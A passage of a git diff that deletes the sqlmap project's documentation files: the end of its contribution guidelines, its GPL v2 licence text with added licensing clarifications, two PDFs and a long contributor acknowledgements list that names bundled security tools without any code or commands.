it](https://github.com/sqlmapproject/sqlmap/issues/37). - -Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests). -Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next! - -### Guidelines - -In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions: - -* Each patch should make one logical change. -* Wrap code to 76 columns when possible. -* Avoid tabbing, use four blank spaces instead. -* Before you put time into a non-trivial patch, it is worth discussing it on the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) or privately by [email](mailto:dev@sqlmap.org). -* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected. -* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests. -* Style that is too different from main branch will be ''adapted'' by the developers side. -* Do not touch anything inside `thirdparty/` and `extra/` folders. - -### Licensing - -By submitting code contributions to the sqlmap developers, to the mailing list, or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them. diff --git a/doc/COPYING b/doc/COPYING deleted file mode 100644 index 5fea2b3b..00000000 --- a/doc/COPYING +++ /dev/null @@ -1,372 +0,0 @@ -COPYING -- Describes the terms under which sqlmap is distributed. A copy -of the GNU General Public License (GPL) is appended to this file. - -sqlmap is (C) 2006-2016 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. - -This program is free software; you may redistribute and/or modify it under -the terms of the GNU General Public License as published by the Free -Software Foundation; Version 2 (or later) with the clarifications and -exceptions described below. This guarantees your right to use, modify, and -redistribute this software under certain conditions. If you wish to embed -sqlmap technology into proprietary software, we sell alternative licenses -(contact sales@sqlmap.org). - -Note that the GPL places important restrictions on "derived works", yet it -does not provide a detailed definition of that term. To avoid -misunderstandings, we interpret that term as broadly as copyright law -allows. For example, we consider an application to constitute a "derived -work" for the purpose of this license if it does any of the following: -* Integrates source code from sqlmap. -* Reads or includes sqlmap copyrighted data files, such as xml/queries.xml -* Executes sqlmap and parses the results (as opposed to typical shell or - execution-menu apps, which simply display raw sqlmap output and so are - not derivative works). -* Integrates/includes/aggregates sqlmap into a proprietary executable - installer, such as those produced by InstallShield. -* Links to a library or executes a program that does any of the above - -The term "sqlmap" should be taken to also include any portions or derived -works of sqlmap. This list is not exclusive, but is meant to clarify our -interpretation of derived works with some common examples. Our -interpretation applies only to sqlmap - we do not speak for other people's -GPL works. - -If you have any questions about the GPL licensing restrictions on using -sqlmap in non-GPL works, we would be happy to help. As mentioned above, -we also offer alternative license to integrate sqlmap into proprietary -applications and appliances. - -If you received these files with a written license agreement or contract -stating terms other than the terms above, then that alternative license -agreement takes precedence over these comments. - -Source is provided to this software because we believe users have a right -to know exactly what a program is going to do before they run it. - -Source code also allows you to fix bugs and add new features. You are -highly encouraged to send your changes to dev@sqlmap.org for possible -incorporation into the main distribution. By sending these changes to the -sqlmap developers, to the mailing lists, or via Git pull request, checking -them into the sqlmap source code repository, it is understood (unless you -specify otherwise) that you are offering the sqlmap project the unlimited, -non-exclusive right to reuse, modify, and relicense the code. sqlmap will -always be available Open Source, but this is important because the -inability to relicense code has caused devastating problems for other Free -Software projects (such as KDE and NASM). If you wish to specify special -license conditions of your contributions, just say so when you send them. - -This program is distributed in the hope that it will be useful, but -WITHOUT ANY WARRANTY; without even the implied warranty of -MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -General Public License v2.0 for more details at -http://www.gnu.org/licenses/gpl-2.0.html, or below - -**************************************************************************** - - GNU GENERAL PUBLIC LICENSE - Version 2, June 1991 - - Copyright (C) 1989, 1991 Free Software Foundation, Inc., - 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The licenses for most software are designed to take away your -freedom to share and change it. By contrast, the GNU General Public -License is intended to guarantee your freedom to share and change free -software--to make sure the software is free for all its users. This -General Public License applies to most of the Free Software -Foundation's software and to any other program whose authors commit to -using it. (Some other Free Software Foundation software is covered by -the GNU Lesser General Public License instead.) You can apply it to -your programs, too. - - When we speak of free software, we are referring to freedom, not -price. Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -this service if you wish), that you receive source code or can get it -if you want it, that you can change the software or use pieces of it -in new free programs; and that you know you can do these things. - - To protect your rights, we need to make restrictions that forbid -anyone to deny you these rights or to ask you to surrender the rights. -These restrictions translate to certain responsibilities for you if you -distribute copies of the software, or if you modify it. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must give the recipients all the rights that -you have. You must make sure that they, too, receive or can get the -source code. And you must show them these terms so they know their -rights. - - We protect your rights with two steps: (1) copyright the software, and -(2) offer you this license which gives you legal permission to copy, -distribute and/or modify the software. - - Also, for each author's protection and ours, we want to make certain -that everyone understands that there is no warranty for this free -software. If the software is modified by someone else and passed on, we -want its recipients to know that what they have is not the original, so -that any problems introduced by others will not reflect on the original -authors' reputations. - - Finally, any free program is threatened constantly by software -patents. We wish to avoid the danger that redistributors of a free -program will individually obtain patent licenses, in effect making the -program proprietary. To prevent this, we have made it clear that any -patent must be licensed for everyone's free use or not licensed at all. - - The precise terms and conditions for copying, distribution and -modification follow. - - GNU GENERAL PUBLIC LICENSE - TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION - - 0. This License applies to any program or other work which contains -a notice placed by the copyright holder saying it may be distributed -under the terms of this General Public License. The "Program", below, -refers to any such program or work, and a "work based on the Program" -means either the Program or any derivative work under copyright law: -that is to say, a work containing the Program or a portion of it, -either verbatim or with modifications and/or translated into another -language. (Hereinafter, translation is included without limitation in -the term "modification".) Each licensee is addressed as "you". - -Activities other than copying, distribution and modification are not -covered by this License; they are outside its scope. The act of -running the Program is not restricted, and the output from the Program -is covered only if its contents constitute a work based on the -Program (independent of having been made by running the Program). -Whether that is true depends on what the Program does. - - 1. You may copy and distribute verbatim copies of the Program's -source code as you receive it, in any medium, provided that you -conspicuously and appropriately publish on each copy an appropriate -copyright notice and disclaimer of warranty; keep intact all the -notices that refer to this License and to the absence of any warranty; -and give any other recipients of the Program a copy of this License -along with the Program. - -You may charge a fee for the physical act of transferring a copy, and -you may at your option offer warranty protection in exchange for a fee. - - 2. You may modify your copy or copies of the Program or any portion -of it, thus forming a work based on the Program, and copy and -distribute such modifications or work under the terms of Section 1 -above, provided that you also meet all of these conditions: - - a) You must cause the modified files to carry prominent notices - stating that you changed the files and the date of any change. - - b) You must cause any work that you distribute or publish, that in - whole or in part contains or is derived from the Program or any - part thereof, to be licensed as a whole at no charge to all third - parties under the terms of this License. - - c) If the modified program normally reads commands interactively - when run, you must cause it, when started running for such - interactive use in the most ordinary way, to print or display an - announcement including an appropriate copyright notice and a - notice that there is no warranty (or else, saying that you provide - a warranty) and that users may redistribute the program under - these conditions, and telling the user how to view a copy of this - License. (Exception: if the Program itself is interactive but - does not normally print such an announcement, your work based on - the Program is not required to print an announcement.) - -These requirements apply to the modified work as a whole. If -identifiable sections of that work are not derived from the Program, -and can be reasonably considered independent and separate works in -themselves, then this License, and its terms, do not apply to those -sections when you distribute them as separate works. But when you -distribute the same sections as part of a whole which is a work based -on the Program, the distribution of the whole must be on the terms of -this License, whose permissions for other licensees extend to the -entire whole, and thus to each and every part regardless of who wrote it. - -Thus, it is not the intent of this section to claim rights or contest -your rights to work written entirely by you; rather, the intent is to -exercise the right to control the distribution of derivative or -collective works based on the Program. - -In addition, mere aggregation of another work not based on the Program -with the Program (or with a work based on the Program) on a volume of -a storage or distribution medium does not bring the other work under -the scope of this License. - - 3. You may copy and distribute the Program (or a work based on it, -under Section 2) in object code or executable form under the terms of -Sections 1 and 2 above provided that you also do one of the following: - - a) Accompany it with the complete corresponding machine-readable - source code, which must be distributed under the terms of Sections - 1 and 2 above on a medium customarily used for software interchange; or, - - b) Accompany it with a written offer, valid for at least three - years, to give any third party, for a charge no more than your - cost of physically performing source distribution, a complete - machine-readable copy of the corresponding source code, to be - distributed under the terms of Sections 1 and 2 above on a medium - customarily used for software interchange; or, - - c) Accompany it with the information you received as to the offer - to distribute corresponding source code. (This alternative is - allowed only for noncommercial distribution and only if you - received the program in object code or executable form with such - an offer, in accord with Subsection b above.) - -The source code for a work means the preferred form of the work for -making modifications to it. For an executable work, complete source -code means all the source code for all modules it contains, plus any -associated interface definition files, plus the scripts used to -control compilation and installation of the executable. However, as a -special exception, the source code distributed need not include -anything that is normally distributed (in either source or binary -form) with the major components (compiler, kernel, and so on) of the -operating system on which the executable runs, unless that component -itself accompanies the executable. - -If distribution of executable or object code is made by offering -access to copy from a designated place, then offering equivalent -access to copy the source code from the same place counts as -distribution of the source code, even though third parties are not -compelled to copy the source along with the object code. - - 4. You may not copy, modify, sublicense, or distribute the Program -except as expressly provided under this License. Any attempt -otherwise to copy, modify, sublicense or distribute the Program is -void, and will automatically terminate your rights under this License. -However, parties who have received copies, or rights, from you under -this License will not have their licenses terminated so long as such -parties remain in full compliance. - - 5. You are not required to accept this License, since you have not -signed it. However, nothing else grants you permission to modify or -distribute the Program or its derivative works. These actions are -prohibited by law if you do not accept this License. Therefore, by -modifying or distributing the Program (or any work based on the -Program), you indicate your acceptance of this License to do so, and -all its terms and conditions for copying, distributing or modifying -the Program or works based on it. - - 6. Each time you redistribute the Program (or any work based on the -Program), the recipient automatically receives a license from the -original licensor to copy, distribute or modify the Program subject to -these terms and conditions. You may not impose any further -restrictions on the recipients' exercise of the rights granted herein. -You are not responsible for enforcing compliance by third parties to -this License. - - 7. If, as a consequence of a court judgment or allegation of patent -infringement or for any other reason (not limited to patent issues), -conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot -distribute so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you -may not distribute the Program at all. For example, if a patent -license would not permit royalty-free redistribution of the Program by -all those who receive copies directly or indirectly through you, then -the only way you could satisfy both it and this License would be to -refrain entirely from distribution of the Program. - -If any portion of this section is held invalid or unenforceable under -any particular circumstance, the balance of the section is intended to -apply and the section as a whole is intended to apply in other -circumstances. - -It is not the purpose of this section to induce you to infringe any -patents or other property right claims or to contest validity of any -such claims; this section has the sole purpose of protecting the -integrity of the free software distribution system, which is -implemented by public license practices. Many people have made -generous contributions to the wide range of software distributed -through that system in reliance on consistent application of that -system; it is up to the author/donor to decide if he or she is willing -to distribute software through any other system and a licensee cannot -impose that choice. - -This section is intended to make thoroughly clear what is believed to -be a consequence of the rest of this License. - - 8. If the distribution and/or use of the Program is restricted in -certain countries either by patents or by copyrighted interfaces, the -original copyright holder who places the Program under this License -may add an explicit geographical distribution limitation excluding -those countries, so that distribution is permitted only in or among -countries not thus excluded. In such case, this License incorporates -the limitation as if written in the body of this License. - - 9. The Free Software Foundation may publish revised and/or new versions -of the General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - -Each version is given a distinguishing version number. If the Program -specifies a version number of this License which applies to it and "any -later version", you have the option of following the terms and conditions -either of that version or of any later version published by the Free -Software Foundation. If the Program does not specify a version number of -this License, you may choose any version ever published by the Free Software -Foundation. - - 10. If you wish to incorporate parts of the Program into other free -programs whose distribution conditions are different, write to the author -to ask for permission. For software which is copyrighted by the Free -Software Foundation, write to the Free Software Foundation; we sometimes -make exceptions for this. Our decision will be guided by the two goals -of preserving the free status of all derivatives of our free software and -of promoting the sharing and reuse of software generally. - - NO WARRANTY - - 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY -FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN -OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES -PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED -OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF -MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS -TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE -PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, -REPAIR OR CORRECTION. - - 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR -REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, -INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING -OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED -TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY -YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER -PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE -POSSIBILITY OF SUCH DAMAGES. - - END OF TERMS AND CONDITIONS - -**************************************************************************** - -This license does not apply to the following components: - -* The Ansistrm library located under thirdparty/ansistrm/. -* The Beautiful Soup library located under thirdparty/beautifulsoup/. -* The Bottle library located under thirdparty/bottle/. -* The Chardet library located under thirdparty/chardet/. -* The ClientForm library located under thirdparty/clientform/. -* The Colorama library located under thirdparty/colorama/. -* The Fcrypt library located under thirdparty/fcrypt/. -* The Gprof2dot library located under thirdparty/gprof2dot/. -* The KeepAlive library located under thirdparty/keepalive/. -* The Magic library located under thirdparty/magic/. -* The MultipartPost library located under thirdparty/multipartpost/. -* The Odict library located under thirdparty/odict/. -* The Oset library located under thirdparty/oset/. -* The PageRank library located under thirdparty/pagerank/. -* The PrettyPrint library located under thirdparty/prettyprint/. -* The PyDes library located under thirdparty/pydes/. -* The SocksiPy library located under thirdparty/socks/. -* The Termcolor library located under thirdparty/termcolor/. -* The XDot library located under thirdparty/xdot/. -* The icmpsh tool located under extra/icmpsh/. - -Details for the above packages can be found in the THIRD-PARTY.md file. diff --git a/doc/FAQ.pdf b/doc/FAQ.pdf deleted file mode 100644 index 0a17b98f..00000000 Binary files a/doc/FAQ.pdf and /dev/null differ diff --git a/doc/README.pdf b/doc/README.pdf deleted file mode 100644 index fd5e4f72..00000000 Binary files a/doc/README.pdf and /dev/null differ diff --git a/doc/THANKS.md b/doc/THANKS.md deleted file mode 100644 index 70fc9741..00000000 --- a/doc/THANKS.md +++ /dev/null @@ -1,799 +0,0 @@ -# Individuals - -Andres Tarasco Acuna, -* for suggesting a feature - -Santiago Accurso, -* for reporting a bug - -Syed Afzal, -* for contributing a WAF script varnish.py - -Zaki Akhmad, -* for suggesting a couple of features - -Olu Akindeinde, -* for reporting a couple of bugs - -David Alvarez, -* for reporting a bug - -Sergio Alves, -* for reporting a bug - -Thomas Anderson, -* for reporting a bug - -Chip Andrews, -* for his excellent work maintaining the SQL Server versions database at SQLSecurity.com and permission to implement the update feature taking data from his site - -Smith Andy, -* for suggesting a feature - -Otavio Augusto, -* for reporting a minor bug - -Simon Baker, -* for reporting some bugs - -Ryan Barnett, -* for organizing the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html - -Emiliano Bazaes, -* for reporting a minor bug - -Daniele Bellucci, -* for starting sqlmap project and developing it between July and August 2006 - -Sebastian Bittig, and the rest of the team at r-tec IT Systeme GmbH -* for contributing the DB2 support initial patch: fingerprint and enumeration - -Anthony Boynes, -* for reporting several bugs - -Marcelo Toscani Brandao -* for reporting a bug - -Velky Brat, -* for suggesting a minor enhancement to the bisection algorithm - -James Briggs, -* for suggesting a minor enhancement - -Gianluca Brindisi, -* for reporting a couple of bugs - -Jack Butler, -* for contributing the sqlmap site favicon - -Ulisses Castro, -* for reporting a bug - -Roberto Castrogiovanni, -* for reporting a minor bug - -Cesar Cerrudo, -* for his Windows access token kidnapping tool Churrasco included in sqlmap tree as a contrib library and used to run the stand-alone payload stager on the target Windows machine as SYSTEM user if the user wants to perform a privilege escalation attack, http://www.argeniss.com/research/TokenKidnapping.pdf - -Karl Chen, -* for contributing the initial multi-threading patch for the inference algorithm - -Y P Chien, -* for reporting a minor bug - -Pierre Chifflier, and Mark Hymers, -* for uploading and accepting the sqlmap Debian package to the official Debian project repository - -Hysia Chow -* for contributing a couple of WAF scripts - -Chris Clements, -* for reporting a couple of bugs - -John Cobb, -* for reporting a minor bug - -Andreas Constantinides, -* for reporting a minor bug - -Andre Costa, -* for reporting a minor bug -* for suggesting a minor enhancement - -Ulises U. Cune, -* for reporting a bug - -Alessandro Curio, -* for reporting a minor bug - -Alessio Dalla Piazza, -* for reporting a couple of bugs - -Sherif El-Deeb, -* for reporting a minor bug - -Stefano Di Paola, -* for suggesting good features - -Mosk Dmitri, -* for reporting a minor bug - -Meng Dong, -* for contributing a code for Waffit integration - -Carey Evans, -* for his fcrypt module that allows crypt(3) support - on Windows platforms - -Shawn Evans, -* for suggesting an idea for one tamper script, greatest.py - -Adam Faheem, -* for reporting a few bugs - -James Fisher, -* for contributing two very good feature requests -* for his great tool too brute force directories and files names on web/application servers, DirBuster, http://tinyurl.com/dirbuster - -Jim Forster, -* for reporting a bug - -Rong-En Fan, -* for commiting the sqlmap 0.5 port to the official FreeBSD project repository - -Giorgio Fedon, -* for suggesting a speed improvement for bisection algorithm -* for reporting a bug when running against Microsoft SQL Server 2005 - -Kasper Fons, -* for reporting several bugs - -Jose Fonseca, -* for his Gprof2Dot utility for converting profiler output to dot graph(s) and for his XDot utility to render nicely dot graph(s), both included in sqlmap tree inside extra folder. These libraries are used for sqlmap development purposes only - http://code.google.com/p/jrfonseca/wiki/Gprof2Dot - http://code.google.com/p/jrfonseca/wiki/XDot - -Alan Franzoni, -* for helping out with Python subprocess library - -Harold Fry, -* for suggesting a minor enhancement - -Daniel G. Gamonal, -* for reporting a minor bug - -Marcos Mateos Garcia, -* for reporting a minor bug - -Andrew Gecse, -* for reporting a minor issue - -Ivan Giacomelli, -* for reporting a bug -* for suggesting a minor enhancement -* for reviewing the documentation - -Dimitris Giannitsaros, -* for contributing a REST-JSON API client - -Nico Golde, -* for reporting a couple of bugs - -Oliver Gruskovnjak, -* for reporting a bug -* for contributing a minor patch - -Davide Guerri, -* for suggesting an enhancement - -Dan Guido, -* for promoting sqlmap in the context of the Penetration Testing and Vulnerability Analysis class at the Polytechnic University of New York, http://isisblogs.poly.edu/courses/pentest/ - -David Guimaraes, -* for reporting considerable amount of bugs -* for suggesting several features - -Chris Hall, -* for coding the prettyprint.py library - -Tate Hansen, -* for donating to sqlmap development - -Mario Heiderich, -Christian Matthies, -Lars H. Strojny, -* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, http://php-ids.org - -Kristian Erik Hermansen, -* for reporting a bug -* for donating to sqlmap development - -Alexander Hagenah, -* for reporting a minor bug - -Dennis Hecken, -* for reporting a minor bug - -Choi Ho, -* for reporting a minor bug - -Jorge Hoya, -* for suggesting a minor enhancement - -Will Holcomb, -* for his MultipartPostHandler class to handle multipart POST forms and permission to include it within sqlmap source code - -Daniel Huckmann, -* for reporting a couple of bugs - -Daliev Ilya, -* for reporting a bug - -Mehmet İnce, -* for contributing a tamper script xforwardedfor.py - -Jovon Itwaru, -* for reporting a minor bug - -Prashant Jadhav, -* for reporting a bug - -Dirk Jagdmann, -* for reporting a typo in the documentation - -Luke Jahnke, -* for reporting a bug when running against MySQL < 5.0 - -Andrew Kitis -* for contributing a tamper script lowercase.py - -David Klein, -* for reporting a minor code improvement - -Sven Klemm, -* for reporting two minor bugs with PostgreSQL - -Anant Kochhar, -* for providing with feedback on the user's manual - -Dmitriy Kononov, -* for reporting a minor bug - -Alexander Kornbrust, -* for reporting a couple of bugs - -Krzysztof Kotowicz, -* for reporting a minor bug - -Nicolas Krassas, -* for reporting a couple of bugs - -Oliver Kuckertz, -* for contributing a minor patch - -Alex Landa, -* for contributing a patch adding beta support for XML output - -Guido Landi, -* for reporting a couple of bugs -* for the great technical discussions -* for Microsoft SQL Server 2000 and Microsoft SQL Server 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploit development -* for presenting with Bernardo at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009 - -Lee Lawson, -* for reporting a minor bug - -John J. Lee, and others -* for developing the clientform Python library used by sqlmap to parse forms when --forms switch is specified - -Nico Leidecker, -* for providing with feedback on a few features -* for reporting a couple of bugs -* for his great tool icmpsh included in sqlmap tree to get a command prompt via an out-of-band tunnel over ICMP, http://leidecker.info/downloads/icmpsh.zip - -Gabriel Lima, -* for reporting a couple of bugs - -Svyatoslav Lisin, -* for suggesting a minor feature - -Miguel Lopes, -* for reporting a minor bug - -Truong Duc Luong, -* for reporting a minor bug - -Pavol Luptak, -* for reporting a bug when injecting on a POST data parameter - -Till Maas, -* for suggesting a minor feature - -Michael Majchrowicz, -* for extensively beta-testing sqlmap on various MySQL DBMS -* for providing really appreciated feedback -* for suggesting a lot of ideas and features - -Vinícius Henrique Marangoni, -* for contributing a Portuguese translation of README.md - -Ahmad Maulana, -* for contributing a tamper script halfversionedmorekeywords.py - -Ferruh Mavituna, -* for exchanging ideas on the implementation of a couple of features - -David McNab, -* for his XMLObject module that allows XML files to be operated on like Python objects - -Spencer J. McIntyre, -* for reporting a minor bug -* for contributing a patch for OS fingerprinting on DB2 - -Brad Merrell, -* for reporting a minor bug - -Michael Meyer, -* for suggesting a minor feature - -Enrico Milanese, -* for reporting a minor bug -* for sharing some ideas for the PHP backdoor - -Liran Mimoni, -* for reporting a minor bug - -Marco Mirandola, -* for reporting a minor bug - -Devon Mitchell, -* for reporting a minor bug - -Anton Mogilin, -* for reporting a few bugs - -Sergio Molina, -* for reporting a minor bug - -Anastasios Monachos, -* for providing some useful data -* for suggesting a feature -* for reporting a couple of bugs - -Kirill Morozov, -* for reporting a bug -* for suggesting a feature - -Alejo Murillo Moya, -* for reporting a minor bug -* for suggesting a few features - -Yonny Mutai, -* for reporting a minor bug - -Roberto Nemirovsky, -* for pointing out some enhancements - -Sebastian Nerz, -* for reporting a (potential) vulnerability in --eval - -Simone Onofri, -* for patching the PHP web backdoor to make it work properly also on Windows - -Michele Orru, -* for reporting a couple of bug -* for suggesting ideas on how to implement the RESTful API - -Shaohua Pan, -* for reporting several bugs -* for suggesting a few features - -Antonio Parata, -* for sharing some ideas for the PHP backdoor - -Adrian Pastor, -* for donating to sqlmap development - -Christopher Patten, -* for reporting a bug in the blind SQL injection bisection algorithm - -Zack Payton, -* for reporting a minor bug - -Jaime Penalba, -* for contributing a patch for INSERT/UPDATE generic boundaries - -Pedrito Perez, <0ark1ang3l(at)gmail.com> -* for reporting a couple of bugs - -Brandon Perry, -* for reporting a couple of bugs - -Travis Phillips, -* for suggesting a minor enhancement - -Mark Pilgrim, -* for porting chardet package (Universal Encoding Detector) to Python - -Steve Pinkham, -* for suggesting a feature -* for contributing a new SQL injection vector (MSSQL time-based blind) -* for donating to sqlmap development - -Adam Pridgen, -* for suggesting some features - -Luka Pusic, -* for reporting a couple of bugs - -Ole Rasmussen, -* for reporting a bug -* for suggesting a feature - -Alberto Revelli, -* for inspiring to write sqlmap user's manual in SGML -* for his great Microsoft SQL Server take over tool, sqlninja, http://sqlninja.sourceforge.net - -David Rhoades, -* for reporting a bug - -Andres Riancho, -* for beta-testing sqlmap -* for reporting a bug and suggesting some features -* for including sqlmap in his great web application audit and attack framework, w3af, http://w3af.sourceforge.net -* for suggesting a way for handling DNS caching - -Jamie Riden, -* for reporting a minor bug - -Alexander Rigbo, -* for contributing a minor patch - -Antonio Riva, -* for reporting a bug when running with python 2.5 - -Ethan Robish, -* for reporting a bug - -Levente Rog, -* for reporting a minor bug - -Andrea Rossi, -* for reporting a minor bug -* for suggesting a feature - -Frederic Roy, -* for reporting a couple of bugs - -Vladimir Rutsky, -* for suggesting a couple of minor enhancements - -Richard Safran, -* for donating the sqlmap.org domain - -Tomoyuki Sakurai, -* for submitting to the FreeBSD project the sqlmap 0.5 port - -Roberto Salgado, -* for contributing considerable amount of tamper scripts - -Pedro Jacques Santos Santiago, -* for reporting considerable amount of bugs - -Marek Sarvas, -* for reporting several bugs - -Philippe A. R. Schaeffer, -* for reporting a minor bug - -Mohd Zamiri Sanin, -* for reporting a minor bug - -Jorge Santos, -* for reporting a minor bug - -Sven Schluter, -* for contributing a patch -* for waiting a number of seconds between each HTTP request - -Ryan Sears, -* for suggesting a couple of enhancements -* for donating to sqlmap development - -Uemit Seren, -* for reporting a minor adjustment when running with python 2.6 - -Shane Sewell, -* for suggesting a feature - -Ahmed Shawky, -* for reporting a major bug with improper handling of parameter values -* for reporting a bug - -Brian Shura, -* for reporting a bug - -Sumit Siddharth, -* for sharing ideas on the implementation of a couple of features - -Andre Silva, -* for reporting a bug - -Benjamin Silva H. -* for reporting a bug - -Duarte Silva -* for reporting a couple of bugs - -M Simkin, -* for suggesting a feature - -Konrads Smelkovs, -* for reporting a few bugs in --sql-shell and --sql-query on Microsoft SQL Server - -Chris Spencer, -* for reviewing the user's manual grammar - -Michael D. Stenner, -* for his keepalive module that allows handling of persistent HTTP 1.1 keep-alive connections - -Marek Stiefenhofer, -* for reporting a few bugs - -Jason Swan, -* for reporting a bug when enumerating columns on Microsoft SQL Server -* for suggesting a couple of improvements - -Chilik Tamir, -* for contributing a patch for initial support SOAP requests - -Alessandro Tanasi, -* for extensively beta-testing sqlmap -* for suggesting many features and reporting some bugs -* for reviewing the documentation - -Andres Tarasco, -* for contributing good feedback - -Tom Thumb, -* for reporting a major bug - -Kazim Bugra Tombul, -* for reporting a minor bug - -Efrain Torres, -* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for commiting it on the Metasploit official subversion repository -* for his great Metasploit WMAP Framework - -Sandro Tosi, -* for helping to create sqlmap Debian package correctly - -Jacco van Tuijl, -* for reporting several bugs - -Vitaly Turenko, -* for reporting a bug - -Augusto Urbieta, -* for reporting a minor bug - -Bedirhan Urgun, -* for reporting a few bugs -* for suggesting some features and improvements -* for benchmarking sqlmap in the context of his SQL injection benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench - -Kyprianos Vasilopoulos, -* for reporting a couple of minor bugs - -Vlado Velichkovski, -* for reporting considerable amount of bugs -* for suggesting an enhancement - -Johnny Venter, -* for reporting a couple of bugs - -Carlos Gabriel Vergara, -* for suggesting couple of good features - -Patrick Webster, -* for suggesting an enhancement - -Ed Williams, -* for suggesting a minor enhancement - -Anthony Zboralski, -* for providing with detailed feedback -* for reporting a few minor bugs -* for donating to sqlmap development - -Thierry Zoller, -* for reporting a couple of major bugs - -Zhen Zhou, -* for suggesting a feature - --insane-, -* for reporting a minor bug - -1ndr4 joe, -* for reporting a couple of bugs - -abc abc, -* for reporting a minor bug - -Abuse 007, -* for reporting a bug - -agix, -* for contributing the file upload via certutil.exe functionality - -Alex, -* for reporting a minor bug - -anonymous anonymous, -* for reporting a couple of bugs - -bamboo, -* for reporting a couple of bugs - -Brandon E., -* for reporting a bug - -black zero, -* for reporting a minor bug - -blueBoy, -* for reporting a bug - -buawig, -* for reporting considerable amount of bugs - -Bugtrace, -* for reporting several bugs - -cats, -* for reporting a couple of bugs - -Christian S, -* for reporting a minor bug - -clav, -* for reporting a minor bug - -dragoun dash, -* for reporting a minor bug - -flsf, -* for contributing WAF scripts 360.py, anquanbao.py, baidu.py, safedog.py -* for contributing a minor patch - -fufuh, -* for reporting a bug when running on Windows - -Hans Wurst, -* for reporting a couple of bugs - -Hysia, -* for contributing a Chinese translation of README.md - -james, -* for reporting a bug - -Joe "Pragmatk", -* for reporting a few bugs - -John Smith, -* for reporting several bugs -* for suggesting some features - -m4l1c3, -* for reporting considerable amount of bugs - -mariano, -* for reporting a bug - -mitchell, -* for reporting a few bugs - -Nadzree, -* for reporting a minor bug - -nightman, -* for reporting considerable amount of bugs - -Oso Dog osodog123(at)yahoo.com -* for reporting a minor bug - -pacman730, -* for reporting a bug - -pentestmonkey, -* for reporting several bugs -* for suggesting a few minor enhancements - -Phat R., -* for reporting a few bugs - -Phil P, <(at)superevr> -* for suggesting a minor enhancement - -ragos, -* for reporting a minor bug - -rmillet, -* for reporting a bug - -Rub3nCT, -* for reporting a minor bug - -shiftzwei, -* for reporting a couple of bugs - -smith, -* for reporting a minor bug - -Soma Cruz, -* for reporting a minor bug - -Spiros94, -* for contributing a Greek translation of README.md - -Stuffe, -* for reporting a minor bug and a feature request - -Sylphid, -* for suggesting some features - -syssecurity.info, -* for reporting a minor bug - -This LittlePiggy, -* for reporting a minor bug - -ToR, -* for reporting considerable amount of bugs -* for suggesting a feature - -ultramegaman, -* for reporting a minor bug - -Vinicius, -* for reporting a minor bug - -wanglei, -* for reporting a minor bug - -warninggp, -* for reporting a few minor bugs - -x, -* for reporting a bug - -zhouhx, -* for contributing a minor patch - -# Organizations - -Black Hat team, -* for the opportunity to present my research titled 'Advanced SQL injection to operating system full control' at Black Hat Europe 2009 Briefings on April 16, 2009 in Amsterdam (NL). I unveiled and demonstrated some of the sqlmap 0.7 release candidate version new features during my presentation - * Homepage: http://goo.gl/BKfs7 - * Slides: http://goo.gl/Dh65t - * White paper: 